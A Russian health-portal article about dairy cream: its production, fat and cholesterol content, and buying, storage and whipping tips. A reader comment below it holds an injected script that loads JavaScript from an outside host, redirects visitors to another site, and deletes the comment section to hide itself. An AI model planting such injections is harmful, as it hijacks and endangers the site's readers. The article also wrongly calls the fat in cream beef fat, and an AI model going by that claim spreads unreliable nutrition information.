Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сливки: не слишком ли жир...  >>  Сливки: не слишком ли жирно?
 
Обратная связь
 

Сливки: не слишком ли жирно?

Размер шрифта
21 февраля 2012 10:00
  • google_analytics: false
  • Нравится

По сути, сливки – это то же молоко, просто очень жирное. Полезен ли такой жир и можно ли сохранить фигуру, если жить без сливок невозможно? Как выбрать сливки, как хранить, и с чем подать их к столу?

1

Как только человек научился доить животных, он обнаружил, что из молока можно делать сливки. Верхний слой (сливки) образуется при стоянии в тепле свежего надоенного молока. Жир всплывает просто потому, что он легче воды. Такое явление вызвано всплытием более легких жиров кверху. Под слоем сливок жиры все равно остаются, причем в весьма высоком содержании (3-6 %).

Свое название сливки получили по методу получения: верхний, более вкусный слой отстоявшегося молока сливали для дальнейшей переработки.

Сливки – всего лишь этап для приготовления разнообразных молочных продуктов (сметана, масло). В современном производстве сливки отделяются в центрифуге, или сепараторе. При быстром вращении аппарата капельки жира собираются в один слой за короткое время.

Как и молоко, сливки пастеризуют или стерилизуют. Так увеличивается срок хранения продукта. По составу сливки и молоко близки, но в сливках жира больше: 10-35 %. Все полезные компоненты молока (кальций, витамин D, протеин) содержатся почти в тех же пропорциях. Но в сливках выше содержание жиров, а, значит, и холестерина. Жир в сливках – говяжий. Как известно, по степени полезности твердый говяжий жир находится на последнем месте, после свиного и бараньего. Связано это с избытком насыщенных жирных кислот. О повышенном содержании холестерина в сливках должны помнить люди с повышенным весом и лица с болезнями сердца. Частое потребление молочных жиров ведет к атеросклерозу сосудов.

Пьедестал почета по содержанию белка:

1. Молоко
2. Сливки
3. Сметана

1

Как выбрать сливки

  1. Обращайте внимание на процент жирности. Из-за жирности обычно сливки не прокисают при порче, а горкнут.

  2. Сливки стерилизованные хранятся дольше (до 4х месяцев), чем пастеризованные. Они должны быть упакованы в стеклянную посуду, либо в тетрапакеты с фольгой. Пластиковые упаковки в этом случае недопустимы.

  3. Покупайте сливки в магазине, не доверяйте частным лицам. Покупая молочные продукты с рук, покупатели рискуют заразиться самыми разнообразными инфекциями. Самая частая из них – бруцеллез, проявляющийся болями в суставах.

  4. Смотрите состав: там не должно быть посторонних компонентов, поскольку настоящие сливки изготавливаются исключительно из цельного молока.

Как хранить сливки

Хранить закрытые сливки можно в соответствии со сроком годности. Стерилизованные сливки могут храниться 4 месяца вне холодильника. Открытые сливки могут стоять в холодильнике не больше 3-4 дней, поскольку питательный продукт является хорошей средой размножения бактерий.

Как сливки приготовить

  • Взбить с ягодами и фруктами
  • Крем для выпечки
  • В чистом виде

Взбиваются сливки обязательно с сахаром, часто – с добавлением ванили. Возьмите сливки жирностью не меньше 20%, иначе у вас не получится их взбить.

Кстати, если не хотите наносить вред здоровью, вы можете купить промышленные растительные сливки на основе кокосового молока. В таких сливках жир растительного происхождения и содержит больше полезных ненасыщенных жирных кислот. Молочный жир в них добавляют только для сливочного вкуса. При выраженном сливочном вкусе такой продукт лишен отрицательного влияния на здоровье.

 

Сюжеты по теме:
Снять самые сливки. Вкусно или полезно 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:54

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.